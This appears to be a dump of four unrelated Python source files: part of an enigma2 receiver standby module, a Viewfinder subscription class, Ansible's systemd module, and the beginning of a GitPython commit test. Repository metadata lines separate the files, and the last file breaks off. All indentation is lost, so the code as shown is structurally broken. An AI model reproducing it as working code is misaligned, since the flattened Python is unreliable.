self.standbyStopServiceTimer.startLongTimer(5)
self.timeHandler = None
else:
self.timeHandler.m_timeUpdated.get().append(self.stopService)
if self.session.pipshown:
self.infoBarInstance and hasattr(self.infoBarInstance, "showPiP") and self.infoBarInstance.showPiP()
if SystemInfo["ScartSwitch"]:
self.avswitch.setInput("SCART")
else:
self.avswitch.setInput("AUX")
gotoShutdownTime = int(config.usage.standby_to_shutdown_timer.value)
if gotoShutdownTime:
self.standbyTimeoutTimer.startLongTimer(gotoShutdownTime)
if self.StandbyCounterIncrease is not 1:
gotoWakeupTime = isNextWakeupTime(True)
if gotoWakeupTime != -1:
curtime = localtime(time())
if curtime.tm_year > 1970:
wakeup_time = int(gotoWakeupTime - time())
if wakeup_time > 0:
self.standbyWakeupTimer.startLongTimer(wakeup_time)
self.onFirstExecBegin.append(self.__onFirstExecBegin)
self.onClose.append(self.__onClose)
def __onClose(self):
global inStandby
inStandby = None
self.standbyTimeoutTimer.stop()
self.standbyStopServiceTimer.stop()
self.standbyWakeupTimer.stop()
self.timeHandler and self.timeHandler.m_timeUpdated.get().remove(self.stopService)
if self.paused_service:
self.paused_action and self.paused_service.unPauseService()
elif self.prev_running_service:
service = self.prev_running_service.toString()
if config.servicelist.startupservice_onstandby.value:
self.session.nav.playService(eServiceReference(config.servicelist.startupservice.value))
self.infoBarInstance and self.infoBarInstance.servicelist.correctChannelNumber()
else:
self.session.nav.playService(self.prev_running_service)
self.session.screen["Standby"].boolean = False
globalActionMap.setEnabled(True)
if RecordTimer.RecordTimerEntry.receiveRecordEvents:
RecordTimer.RecordTimerEntry.stopTryQuitMainloop()
self.avswitch.setInput("ENCODER")
self.leaveMute()
if os.path.exists("/usr/script/standby_leave.sh"):
Console().ePopen("/usr/script/standby_leave.sh")
if config.usage.remote_fallback_import_standby.value:
ImportChannels()
def __onFirstExecBegin(self):
global inStandby
inStandby = self
self.session.screen["Standby"].boolean = True
if self.StandbyCounterIncrease:
config.misc.standbyCounter.value += 1
def Power(self):
print "[Standby] leave standby"
self.close(True)
def setMute(self):
self.wasMuted = eDVBVolumecontrol.getInstance().isMuted()
if not self.wasMuted:
eDVBVolumecontrol.getInstance().volumeMute()
def leaveMute(self):
if not self.wasMuted:
eDVBVolumecontrol.getInstance().volumeUnMute()
def stopService(self):
self.prev_running_service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if Components.ParentalControl.parentalControl.isProtected(self.prev_running_service):
self.prev_running_service = eServiceReference(config.tv.lastservice.value)
self.session.nav.stopService()
def standbyTimeout(self):
if config.usage.standby_to_shutdown_timer_blocktime.value:
curtime = localtime(time())
if curtime.tm_year > 1970: #check if the current time is valid
curtime = (curtime.tm_hour, curtime.tm_min, curtime.tm_sec)
begintime = tuple(config.usage.standby_to_shutdown_timer_blocktime_begin.value)
endtime = tuple(config.usage.standby_to_shutdown_timer_blocktime_end.value)
if begintime <= endtime and (curtime >= begintime and curtime < endtime) or begintime > endtime and (curtime >= begintime or curtime < endtime):
duration = (endtime[0] * 3600 + endtime[1] * 60) - (curtime[0] * 3600 + curtime[1] * 60 + curtime[2])
if duration:
if duration < 0:
duration += 24 * 3600
self.standbyTimeoutTimer.startLongTimer(duration)
return
if self.session.screen["TunerInfo"].tuner_use_mask or mediafilesInUse(self.session):
self.standbyTimeoutTimer.startLongTimer(600)
else:
RecordTimer.RecordTimerEntry.TryQuitMainloop()
def standbyWakeup(self):
self.Power()
def createSummary(self):
return StandbySummary
class Standby(StandbyScreen):
def __init__(self, session, StandbyCounterIncrease=True):
if checkTimeshiftRunning():
self.skin = """<screen position="0,0" size="0,0"/>"""
Screen.__init__(self, session)
self.infoBarInstance = isInfoBarInstance()
self.StandbyCounterIncrease = StandbyCounterIncrease
self.onFirstExecBegin.append(self.showCheckTimeshiftRunning)
self.onHide.append(self.close)
else:
StandbyScreen.__init__(self, session, StandbyCounterIncrease)
def showCheckTimeshiftRunning(self):
self.infoBarInstance.checkTimeshiftRunning(self.showCheckTimeshiftRunningCallback, timeout=20)
def showCheckTimeshiftRunningCallback(self, answer=False):
if answer:
self.onClose.append(self.goStandby)
def goStandby(self):
Notifications.AddNotification(StandbyScreen, self.StandbyCounterIncrease)
class StandbySummary(Screen):
skin = """
<screen position="0,0" size="132,64">
<widget source="global.CurrentTime" render="Label" position="0,0" size="132,64" font="Regular;40" halign="center">
<convert type="ClockToText" />
</widget>
<widget source="session.RecordState" render="FixedLabel" text=" " position="0,0" size="132,64" zPosition="1" >
<convert type="ConfigEntryTest">config.usage.blinking_display_clock_during_recording,True,CheckSourceBoolean</convert>
<convert type="ConditionalShowHide">Blink</convert>
</widget>
</screen>"""
class QuitMainloopScreen(Screen):
def __init__(self, session, retvalue=QUIT_SHUTDOWN):
self.skin = """<screen name="QuitMainloopScreen" position="fill" flags="wfNoBorder">
<ePixmap pixmap="icons/input_info.png" position="c-27,c-60" size="53,53" alphatest="on" />
<widget name="text" position="center,c+5" size="720,100" font="Regular;22" halign="center" />
</screen>"""
Screen.__init__(self, session)
from Components.Label import Label
text = {
QUIT_SHUTDOWN: _("Your receiver is shutting down"),
QUIT_REBOOT: _("Your receiver is rebooting"),
QUIT_RESTART: _("The user interface of your receiver is restarting"),
QUIT_UPGRADE_FP: _("Your frontprocessor will be updated\nPlease wait until your receiver reboots\nThis may take a few minutes"),
QUIT_DEBUG_RESTART: _("The user interface of your receiver is restarting in debug mode"),
QUIT_UPGRADE_PROGRAM: _("Unattended update in progress\nPlease wait until your receiver reboots\nThis may take a few minutes"),
QUIT_MANUFACTURER_RESET: _("Manufacturer reset in progress\nPlease wait until enigma2 restarts")
}.get(retvalue)
self["text"] = Label(text)
inTryQuitMainloop = False
def getReasons(session, retvalue=QUIT_SHUTDOWN):
recordings = session.nav.getRecordings()
jobs = len(job_manager.getPendingJobs())
reasons = []
next_rec_time = -1
if not recordings:
next_rec_time = session.nav.RecordTimer.getNextRecordingTime()
if recordings or (next_rec_time > 0 and (next_rec_time - time()) < 360):
reasons.append(_("Recording(s) are in progress or coming up in few seconds!"))
if jobs:
if jobs == 1:
job = job_manager.getPendingJobs()[0]
reasons.append("%s: %s (%d%%)" % (job.getStatustext(), job.name, int(100 * job.progress / float(job.end))))
else:
reasons.append((ngettext("%d job is running in the background!", "%d jobs are running in the background!", jobs) % jobs))
if checkTimeshiftRunning():
reasons.append(_("You seem to be in timeshift!"))
if eStreamServer.getInstance().getConnectedClients() or StreamServiceList:
reasons.append(_("Client is streaming from this box!"))
if not reasons and mediafilesInUse(session) and retvalue in (QUIT_SHUTDOWN, QUIT_REBOOT, QUIT_UPGRADE_FP, QUIT_UPGRADE_PROGRAM):
reasons.append(_("A file from media is in use!"))
return "\n".join(reasons)
class TryQuitMainloop(MessageBox):
def __init__(self, session, retvalue=QUIT_SHUTDOWN, timeout=-1, default_yes=False, check_reasons=True):
self.retval = retvalue
self.connected = False
reason = check_reasons and getReasons(session, retvalue)
if reason:
text = {
QUIT_SHUTDOWN: _("Really shutdown now?"),
QUIT_REBOOT: _("Really reboot now?"),
QUIT_RESTART: _("Really restart now?"),
QUIT_UPGRADE_FP: _("Really update the frontprocessor and reboot now?"),
QUIT_DEBUG_RESTART: _("Really restart in debug mode now?"),
QUIT_UPGRADE_PROGRAM: _("Really update your settop box and reboot now?"),
QUIT_MANUFACTURER_RESET: _("Really perform a manufacturer reset now?")
}.get(retvalue, None)
if text:
MessageBox.__init__(self, session, "%s\n%s" % (reason, text), type=MessageBox.TYPE_YESNO, timeout=timeout, default=default_yes)
self.skinName = "MessageBoxSimple"
session.nav.record_event.append(self.getRecordEvent)
self.connected = True
self.onShow.append(self.__onShow)
self.onHide.append(self.__onHide)
return
self.skin = """<screen position="0,0" size="0,0"/>"""
Screen.__init__(self, session)
self.close(True)
def getRecordEvent(self, recservice, event):
if event == iRecordableService.evEnd:
recordings = self.session.nav.getRecordings()
if not recordings: # no more recordings exist
rec_time = self.session.nav.RecordTimer.getNextRecordingTime()
if rec_time > 0 and (rec_time - time()) < 360:
self.initTimeout(360) # wait for next starting timer
self.startTimer()
else:
self.close(True) # immediate shutdown
elif event == iRecordableService.evStart:
self.stopTimer()
def close(self, value):
if self.connected:
self.connected = False
self.session.nav.record_event.remove(self.getRecordEvent)
if value:
self.hide()
if self.retval == QUIT_SHUTDOWN:
config.misc.DeepStandby.value = True
if not inStandby:
if os.path.exists("/usr/script/standby_enter.sh"):
Console().ePopen("/usr/script/standby_enter.sh")
if SystemInfo["HasHDMI-CEC"] and config.hdmicec.enabled.value and config.hdmicec.control_tv_standby.value and config.hdmicec.next_boxes_detect.value:
import Components.HdmiCec
Components.HdmiCec.hdmi_cec.secondBoxActive()
self.delay = eTimer()
self.delay.timeout.callback.append(self.quitMainloop)
self.delay.start(1500, True)
return
elif not inStandby:
config.misc.RestartUI.value = True
config.misc.RestartUI.save()
self.quitMainloop()
else:
MessageBox.close(self, True)
def quitMainloop(self):
self.session.nav.stopService()
self.quitScreen = self.session.instantiateDialog(QuitMainloopScreen, retvalue=self.retval)
self.quitScreen.show()
quitMainloop(self.retval)
def __onShow(self):
global inTryQuitMainloop
inTryQuitMainloop = True
def __onHide(self):
global inTryQuitMainloop
inTryQuitMainloop = False
| gpl-2.0 | 2,006,730,632,789,092,900 | 37.92623 | 193 | 0.747245 | false |
jiangzhonghui/viewfinder | backend/db/subscription.py | 13 | 6249 | # Copyright 2012 Viewfinder Inc. All Rights Reserved
"""User subscription table.
A subscription is any time-limited modification to a user's privileges,
such as increased storage quota. Subscriptions may be paid (initially
supporting iOS in-app purchases) or granted for other reasons such as
referring new users.
"""
__author__ = '[email protected] (Ben Darnell)'
from copy import deepcopy
import time
from viewfinder.backend.base import util
from viewfinder.backend.db import vf_schema
from viewfinder.backend.db.base import DBObject
from viewfinder.backend.db.range_base import DBRangeObject
from viewfinder.backend.op.notification_manager import NotificationManager
from viewfinder.backend.services import itunes_store
kITunesPrefix = 'itunes:'
@DBObject.map_table_attributes
class Subscription(DBRangeObject):
"""User subscription data object."""
__slots__ = []
_table = DBObject._schema.GetTable(vf_schema.SUBSCRIPTION)
# Since our subscriptions are a combination of storage quotas and
# feature access, give each one its own product type for now.
_ITUNES_PRODUCTS = {
# vf_sub1 = "Viewfinder Plus" - cloud storage option and 5GB
'vf_sub1': dict(product_type='vf_sub1', quantity=5),
# vf_sub2 = "Viewfinder Pro" - cloud storage, store originals, and 50GB
'vf_sub2': dict(product_type='vf_sub2', quantity=50),
}
_JSON_ATTRIBUTES = set(['transaction_id', 'subscription_id', 'timestamp', 'expiration_ts', 'product_type',
'quantity', 'payment_type'])
"""Subset of subscription attributes that are returned to the owning user in query_users."""
@classmethod
def _GetITunesProductInfo(cls, verify_response):
"""Maps iTunes product names to Subscription attributes.
An iTunes "product" also includes information about the billing
cycle; by convention we name our products with a suffix of "_month"
or "_year" (etc).
"""
product_id = verify_response.GetProductId()
base_product, billing_cycle = product_id.rsplit('_', 1)
assert billing_cycle in ('month', 'year'), billing_cycle
return Subscription._ITUNES_PRODUCTS[base_product]
@classmethod
def GetITunesTransactionId(cls, verify_response):
"""Returns the transaction id for an iTunes transaction.
The returned id is usable as a range key for Subscription.Query.
"""
return kITunesPrefix + verify_response.GetRenewalTransactionId()
@classmethod
def GetITunesSubscriptionId(cls, verify_response):
"""Returns the subscription id for an iTunes transaction.
THe returned id will be the same for all transactions in a series of renewals.
"""
return kITunesPrefix + verify_response.GetOriginalTransactionId()
@classmethod
def CreateFromITunes(cls, user_id, verify_response):
"""Creates a subscription object for an iTunes transaction.
The verify_response argument is a response from
viewfinder.backend.services.itunes_store.ITunesStoreClient.VerifyReceipt.
The new object is returned but not saved to the database.
"""
assert verify_response.IsValid()
sub_dict = dict(
user_id=user_id,
transaction_id=Subscription.GetITunesTransactionId(verify_response),
subscription_id=Subscription.GetITunesSubscriptionId(verify_response),
timestamp=verify_response.GetTransactionTime(),
expiration_ts=verify_response.GetExpirationTime(),
payment_type='itunes',
extra_info=verify_response.GetLatestReceiptInfo(),
renewal_data=verify_response.GetRenewalData(),
)
sub_dict.update(**Subscription._GetITunesProductInfo(verify_response))
sub = Subscription.CreateFromKeywords(**sub_dict)
return sub
@classmethod
def RecordITunesTransaction(cls, client, callback, user_id, verify_response):
"""Creates a subscription record for an iTunes transaction and saves it to the database.
The verify_response argument is a response from
viewfinder.backend.services.itunes_store.ITunesStoreClient.VerifyReceipt.
"""
sub = Subscription.CreateFromITunes(user_id, verify_response)
sub.Update(client, callback)
@classmethod
def RecordITunesTransactionOperation(cls, client, callback, user_id, verify_response_str):
def _OnRecord():
NotificationManager.NotifyRecordSubscription(client, user_id, callback=callback)
verify_response = itunes_store.VerifyResponse.FromString(verify_response_str)
assert verify_response.IsValid()
Subscription.RecordITunesTransaction(client, _OnRecord, user_id, verify_response)
@classmethod
def QueryByUser(cls, client, callback, user_id, include_expired=False,
include_history=False):
"""Returns a list of Subscription objects for the given user.
By default only includes currently-active subscriptions, and only
one transaction per subscription. To return expired subscriptions,
pass include_expired=True. To return all transactions (even those
superceded by a renewal transaction for the same subscription),
pass include_history=True (which implies include_expired=True).
"""
history_results = []
latest = {}
def _VisitSub(sub, callback):
if include_history:
history_results.append(sub)
else:
if sub.expiration_ts < time.time() and not include_expired:
callback()
return
# Only one transaction per subscription.
if (sub.subscription_id in latest and
latest[sub.subscription_id].timestamp > sub.timestamp):
callback()
return
latest[sub.subscription_id] = sub
callback()
def _OnVisitDone():
if include_history:
assert not latest
callback(history_results)
else:
assert not history_results
callback(latest.values())
Subscription.VisitRange(client, user_id, None, None, _VisitSub, _OnVisitDone)
def MakeMetadataDict(self):
"""Project a subset of subscription attributes that can be provided to the user."""
sub_dict = {}
for attr_name in Subscription._JSON_ATTRIBUTES:
util.SetIfNotNone(sub_dict, attr_name, getattr(self, attr_name, None))
if self.extra_info:
sub_dict['extra_info'] = deepcopy(self.extra_info)
return sub_dict
| apache-2.0 | 2,398,161,972,583,370,000 | 37.574074 | 108 | 0.720595 | false |
emersonsoftware/ansiblefork | lib/ansible/modules/system/systemd.py | 5 | 16377 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Brian Coca <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
module: systemd
author:
- "Ansible Core Team"
version_added: "2.2"
short_description: Manage services.
description:
- Controls systemd services on remote hosts.
options:
name:
required: true
description:
- Name of the service.
aliases: ['unit', 'service']
state:
required: false
default: null
choices: [ 'started', 'stopped', 'restarted', 'reloaded' ]
description:
- C(started)/C(stopped) are idempotent actions that will not run commands unless necessary.
C(restarted) will always bounce the service. C(reloaded) will always reload.
enabled:
required: false
choices: [ "yes", "no" ]
default: null
description:
- Whether the service should start on boot. B(At least one of state and enabled are required.)
masked:
required: false
choices: [ "yes", "no" ]
default: null
description:
- Whether the unit should be masked or not, a masked unit is impossible to start.
daemon_reload:
required: false
default: no
choices: [ "yes", "no" ]
description:
- run daemon-reload before doing any other operations, to make sure systemd has read any changes.
aliases: ['daemon-reload']
user:
required: false
default: no
choices: [ "yes", "no" ]
description:
- run systemctl talking to the service manager of the calling user, rather than the service manager
of the system.
no_block:
required: false
default: no
choices: [ "yes", "no" ]
description:
- Do not synchronously wait for the requested operation to finish.
Enqueued job will continue without Ansible blocking on its completion.
version_added: "2.3"
notes:
- One option other than name is required.
requirements:
- A system managed by systemd
'''
EXAMPLES = '''
# Example action to start service httpd, if not running
- systemd: state=started name=httpd
# Example action to stop service cron on debian, if running
- systemd: name=cron state=stopped
# Example action to restart service cron on centos, in all cases, also issue daemon-reload to pick up config changes
- systemd:
state: restarted
daemon_reload: yes
name: crond
# Example action to reload service httpd, in all cases
- systemd:
name: httpd
state: reloaded
# Example action to enable service httpd and ensure it is not masked
- systemd:
name: httpd
enabled: yes
masked: no
# Example action to enable a timer for dnf-automatic
- systemd:
name: dnf-automatic.timer
state: started
enabled: True
'''
RETURN = '''
status:
description: A dictionary with the key=value pairs returned from `systemctl show`
returned: success
type: complex
sample: {
"ActiveEnterTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"ActiveEnterTimestampMonotonic": "8135942",
"ActiveExitTimestampMonotonic": "0",
"ActiveState": "active",
"After": "auditd.service systemd-user-sessions.service time-sync.target systemd-journald.socket basic.target system.slice",
"AllowIsolate": "no",
"Before": "shutdown.target multi-user.target",
"BlockIOAccounting": "no",
"BlockIOWeight": "1000",
"CPUAccounting": "no",
"CPUSchedulingPolicy": "0",
"CPUSchedulingPriority": "0",
"CPUSchedulingResetOnFork": "no",
"CPUShares": "1024",
"CanIsolate": "no",
"CanReload": "yes",
"CanStart": "yes",
"CanStop": "yes",
"CapabilityBoundingSet": "18446744073709551615",
"ConditionResult": "yes",
"ConditionTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"ConditionTimestampMonotonic": "7902742",
"Conflicts": "shutdown.target",
"ControlGroup": "/system.slice/crond.service",
"ControlPID": "0",
"DefaultDependencies": "yes",
"Delegate": "no",
"Description": "Command Scheduler",
"DevicePolicy": "auto",
"EnvironmentFile": "/etc/sysconfig/crond (ignore_errors=no)",
"ExecMainCode": "0",
"ExecMainExitTimestampMonotonic": "0",
"ExecMainPID": "595",
"ExecMainStartTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"ExecMainStartTimestampMonotonic": "8134990",
"ExecMainStatus": "0",
"ExecReload": "{ path=/bin/kill ; argv[]=/bin/kill -HUP $MAINPID ; ignore_errors=no ; start_time=[n/a] ; stop_time=[n/a] ; pid=0 ; code=(null) ; status=0/0 }",
"ExecStart": "{ path=/usr/sbin/crond ; argv[]=/usr/sbin/crond -n $CRONDARGS ; ignore_errors=no ; start_time=[n/a] ; stop_time=[n/a] ; pid=0 ; code=(null) ; status=0/0 }",
"FragmentPath": "/usr/lib/systemd/system/crond.service",
"GuessMainPID": "yes",
"IOScheduling": "0",
"Id": "crond.service",
"IgnoreOnIsolate": "no",
"IgnoreOnSnapshot": "no",
"IgnoreSIGPIPE": "yes",
"InactiveEnterTimestampMonotonic": "0",
"InactiveExitTimestamp": "Sun 2016-05-15 18:28:49 EDT",
"InactiveExitTimestampMonotonic": "8135942",
"JobTimeoutUSec": "0",
"KillMode": "process",
"KillSignal": "15",
"LimitAS": "18446744073709551615",
"LimitCORE": "18446744073709551615",
"LimitCPU": "18446744073709551615",
"LimitDATA": "18446744073709551615",
"LimitFSIZE": "18446744073709551615",
"LimitLOCKS": "18446744073709551615",
"LimitMEMLOCK": "65536",
"LimitMSGQUEUE": "819200",
"LimitNICE": "0",
"LimitNOFILE": "4096",
"LimitNPROC": "3902",
"LimitRSS": "18446744073709551615",
"LimitRTPRIO": "0",
"LimitRTTIME": "18446744073709551615",
"LimitSIGPENDING": "3902",
"LimitSTACK": "18446744073709551615",
"LoadState": "loaded",
"MainPID": "595",
"MemoryAccounting": "no",
"MemoryLimit": "18446744073709551615",
"MountFlags": "0",
"Names": "crond.service",
"NeedDaemonReload": "no",
"Nice": "0",
"NoNewPrivileges": "no",
"NonBlocking": "no",
"NotifyAccess": "none",
"OOMScoreAdjust": "0",
"OnFailureIsolate": "no",
"PermissionsStartOnly": "no",
"PrivateNetwork": "no",
"PrivateTmp": "no",
"RefuseManualStart": "no",
"RefuseManualStop": "no",
"RemainAfterExit": "no",
"Requires": "basic.target",
"Restart": "no",
"RestartUSec": "100ms",
"Result": "success",
"RootDirectoryStartOnly": "no",
"SameProcessGroup": "no",
"SecureBits": "0",
"SendSIGHUP": "no",
"SendSIGKILL": "yes",
"Slice": "system.slice",
"StandardError": "inherit",
"StandardInput": "null",
"StandardOutput": "journal",
"StartLimitAction": "none",
"StartLimitBurst": "5",
"StartLimitInterval": "10000000",
"StatusErrno": "0",
"StopWhenUnneeded": "no",
"SubState": "running",
"SyslogLevelPrefix": "yes",
"SyslogPriority": "30",
"TTYReset": "no",
"TTYVHangup": "no",
"TTYVTDisallocate": "no",
"TimeoutStartUSec": "1min 30s",
"TimeoutStopUSec": "1min 30s",
"TimerSlackNSec": "50000",
"Transient": "no",
"Type": "simple",
"UMask": "0022",
"UnitFileState": "enabled",
"WantedBy": "multi-user.target",
"Wants": "system.slice",
"WatchdogTimestampMonotonic": "0",
"WatchdogUSec": "0",
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.service import sysv_exists, sysv_is_enabled, fail_if_missing
from ansible.module_utils._text import to_native
def is_running_service(service_status):
return service_status['ActiveState'] in set(['active', 'activating'])
# ===========================================
# Main control flow
def main():
# initialize
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, type='str', aliases=['unit', 'service']),
state = dict(choices=[ 'started', 'stopped', 'restarted', 'reloaded'], type='str'),
enabled = dict(type='bool'),
masked = dict(type='bool'),
daemon_reload = dict(type='bool', default=False, aliases=['daemon-reload']),
user = dict(type='bool', default=False),
no_block = dict(type='bool', default=False),
),
supports_check_mode=True,
required_one_of=[['state', 'enabled', 'masked', 'daemon_reload']],
)
systemctl = module.get_bin_path('systemctl')
if module.params['user']:
systemctl = systemctl + " --user"
if module.params['no_block']:
systemctl = systemctl + " --no-block"
unit = module.params['name']
rc = 0
out = err = ''
result = {
'name': unit,
'changed': False,
'status': {},
'warnings': [],
}
# Run daemon-reload first, if requested
if module.params['daemon_reload']:
(rc, out, err) = module.run_command("%s daemon-reload" % (systemctl))
if rc != 0:
module.fail_json(msg='failure %d during daemon-reload: %s' % (rc, err))
found = False
is_initd = sysv_exists(unit)
is_systemd = False
# check service data, cannot error out on rc as it changes across versions, assume not found
(rc, out, err) = module.run_command("%s show '%s'" % (systemctl, unit))
if rc == 0:
# load return of systemctl show into dictionary for easy access and return
multival = []
if out:
k = None
for line in to_native(out).split('\n'): # systemd can have multiline values delimited with {}
if line.strip():
if k is None:
if '=' in line:
k,v = line.split('=', 1)
if v.lstrip().startswith('{'):
if not v.rstrip().endswith('}'):
multival.append(line)
continue
result['status'][k] = v.strip()
k = None
else:
if line.rstrip().endswith('}'):
result['status'][k] = '\n'.join(multival).strip()
multival = []
k = None
else:
multival.append(line)
is_systemd = 'LoadState' in result['status'] and result['status']['LoadState'] != 'not-found'
# Check for loading error
if is_systemd and 'LoadError' in result['status']:
module.fail_json(msg="Error loading unit file '%s': %s" % (unit, result['status']['LoadError']))
# Does service exist?
found = is_systemd or is_initd
if is_initd and not is_systemd:
result['warnings'].append('The service (%s) is actually an init script but the system is managed by systemd' % unit)
# mask/unmask the service, if requested, can operate on services before they are installed
if module.params['masked'] is not None:
# state is not masked unless systemd affirms otherwise
masked = ('LoadState' in result['status'] and result['status']['LoadState'] == 'masked')
if masked != module.params['masked']:
result['changed'] = True
if module.params['masked']:
action = 'mask'
else:
action = 'unmask'
if not module.check_mode:
(rc, out, err) = module.run_command("%s %s '%s'" % (systemctl, action, unit))
if rc != 0:
# some versions of system CAN mask/unmask non existing services, we only fail on missing if they don't
fail_if_missing(module, found, unit, msg='host')
# Enable/disable service startup at boot if requested
if module.params['enabled'] is not None:
if module.params['enabled']:
action = 'enable'
else:
action = 'disable'
fail_if_missing(module, found, unit, msg='host')
# do we need to enable the service?
enabled = False
(rc, out, err) = module.run_command("%s is-enabled '%s'" % (systemctl, unit))
# check systemctl result or if it is a init script
if rc == 0:
enabled = True
elif rc == 1:
# if not a user service and both init script and unit file exist stdout should have enabled/disabled, otherwise use rc entries
if not module.params['user'] and \
is_initd and \
(not out.strip().endswith('disabled') or sysv_is_enabled(unit)):
enabled = True
# default to current state
result['enabled'] = enabled
# Change enable/disable if needed
if enabled != module.params['enabled']:
result['changed'] = True
if not module.check_mode:
(rc, out, err) = module.run_command("%s %s '%s'" % (systemctl, action, unit))
if rc != 0:
module.fail_json(msg="Unable to %s service %s: %s" % (action, unit, out + err))
result['enabled'] = not enabled
# set service state if requested
if module.params['state'] is not None:
fail_if_missing(module, found, unit, msg="host")
# default to desired state
result['state'] = module.params['state']
# What is current service state?
if 'ActiveState' in result['status']:
action = None
if module.params['state'] == 'started':
if not is_running_service(result['status']):
action = 'start'
elif module.params['state'] == 'stopped':
if is_running_service(result['status']):
action = 'stop'
else:
if not is_running_service(result['status']):
action = 'start'
else:
action = module.params['state'][:-2] # remove 'ed' from restarted/reloaded
result['state'] = 'started'
if action:
result['changed'] = True
if not module.check_mode:
(rc, out, err) = module.run_command("%s %s '%s'" % (systemctl, action, unit))
if rc != 0:
module.fail_json(msg="Unable to %s service %s: %s" % (action, unit, err))
else:
# this should not happen?
module.fail_json(msg="Service is in unknown state", status=result['status'])
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | 6,874,354,297,627,575,000 | 37.086047 | 182 | 0.546071 | false |
analurandis/Tur | backend/venv/Lib/site-packages/git/test/test_commit.py | 2 | 12355 | # -*- coding: utf-8 -*-
# test_commit.py
# Copyright (C) 2008, 2009 Michael Trier ([email protected]) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
from __future__ import print_function
from git.test.lib import (
TestBase,
assert_equal,
assert_not_equal,
with_rw_repo,
fixture_path,
StringProcessAdapter
)
from git import (
Commit,
Actor,
)
from gitdb import IStream
from git.compat import (
string_types,
text_type
)
from io import BytesIO
import time
import sys
import re
def assert_commit_serialization(rwrepo, commit_id, print_performance_info=False):
"""traverse all commits in the history of commit identified by commit_id and check
if the serialization works.
:param print_performance_info: if True, we will show how fast we are"""
ns = 0 # num serializations
nds = 0 # num deserializations
st = time.time()
for cm in rwrepo.commit(commit_id).traverse():
nds += 1
# assert that we deserialize commits correctly, hence we get the same
# sha on serialization
stream = BytesIO()
cm._serialize(stream)
ns += 1
streamlen = stream.tell()
stream.seek(0)
istream = rwrepo.odb.store(IStream(Commit.type, streamlen, stream))
assert istream.hexsha == cm.hexsha.encode('ascii')
nc = Commit(rwrepo, Commit.NULL_BIN_SHA, cm.tree,
cm.author, cm.authored_date, cm.author_tz_offset,
cm.committer, cm.committed_date, cm.committer_tz_offset,
cm.message, cm.parents, cm.encoding)
assert nc.parents == cm.parents
stream = BytesIO()
nc._serialize(stream)
ns += 1
streamlen = stream.tell()
stream.seek(0)
# reuse istream
istream.size = streamlen
istream.stream = stream
istream.binsha = None
nc.binsha = rwrepo.odb.store(istream).binsha
# if it worked, we have exactly the same contents !
assert nc.hexsha == cm.hexsha
# END check commits
elapsed = time.time() - st
if print_performance_info:
print("Serialized %i and deserialized %i commits in %f s ( (%f, %f) commits / s"
% (ns, nds, elapsed, ns / elapsed, nds / elapsed), file=sys.stderr)
# END handle performance info
class TestCommit(TestBase):
def test_bake(self):
commit = self.rorepo.commit('2454ae89983a4496a445ce347d7a41c0bb0ea7ae')
# commits have no dict
self.failUnlessRaises(AttributeError, setattr, commit, 'someattr', 1)
commit.author # bake
assert_equal("Sebastian Thiel", commit.author.name)
assert_equal("[email protected]", commit.author.email)
assert commit.author == commit.committer
assert isinstance(commit.authored_date, int) and isinstance(commit.committed_date, int)
assert isinstance(commit.author_tz_offset, int) and isinstance(commit.committer_tz_offset, int)
assert commit.message == "Added missing information to docstrings of commit and stats module\n"
def test_stats(self):
commit = self.rorepo.commit('33ebe7acec14b25c5f84f35a664803fcab2f7781')
stats = commit.stats
def check_entries(d):
assert isinstance(d, dict)
for key in ("insertions", "deletions", "lines"):
assert key in d
# END assertion helper
assert stats.files
assert stats.total
check_entries(stats.total)
assert "files" in stats.total
for filepath, d in stats.files.items():
check_entries(d)
# END for each stated file
# assure data is parsed properly
michael = Actor._from_string("Michael Trier <[email protected]>")
assert commit.author == michael
assert commit.committer == michael
assert commit.authored_date == 1210193388
assert commit.committed_date == 1210193388
assert commit.author_tz_offset == 14400, commit.author_tz_offset
assert commit.committer_tz_offset == 14400, commit.committer_tz_offset
assert commit.message == "initial project\n"
def test_unicode_actor(self):
# assure we can parse unicode actors correctly
name = u"Üäöß ÄußÉ"
assert len(name) == 9
special = Actor._from_string(u"%s <[email protected]>" % name)
assert special.name == name
assert isinstance(special.name, text_type)
def test_traversal(self):
start = self.rorepo.commit("a4d06724202afccd2b5c54f81bcf2bf26dea7fff")
first = self.rorepo.commit("33ebe7acec14b25c5f84f35a664803fcab2f7781")
p0 = start.parents[0]
p1 = start.parents[1]
p00 = p0.parents[0]
p10 = p1.parents[0]
# basic branch first, depth first
dfirst = start.traverse(branch_first=False)
bfirst = start.traverse(branch_first=True)
assert next(dfirst) == p0
assert next(dfirst) == p00
assert next(bfirst) == p0
assert next(bfirst) == p1
assert next(bfirst) == p00
assert next(bfirst) == p10
# at some point, both iterations should stop
assert list(bfirst)[-1] == first
stoptraverse = self.rorepo.commit("254d04aa3180eb8b8daf7b7ff25f010cd69b4e7d").traverse(as_edge=True)
l = list(stoptraverse)
assert len(l[0]) == 2
# ignore self
assert next(start.traverse(ignore_self=False)) == start
# depth
assert len(list(start.traverse(ignore_self=False, depth=0))) == 1
# prune
assert next(start.traverse(branch_first=1, prune=lambda i, d: i == p0)) == p1
# predicate
assert next(start.traverse(branch_first=1, predicate=lambda i, d: i == p1)) == p1
# traversal should stop when the beginning is reached
self.failUnlessRaises(StopIteration, next, first.traverse())
# parents of the first commit should be empty ( as the only parent has a null
# sha )
assert len(first.parents) == 0
def test_iteration(self):
# we can iterate commits
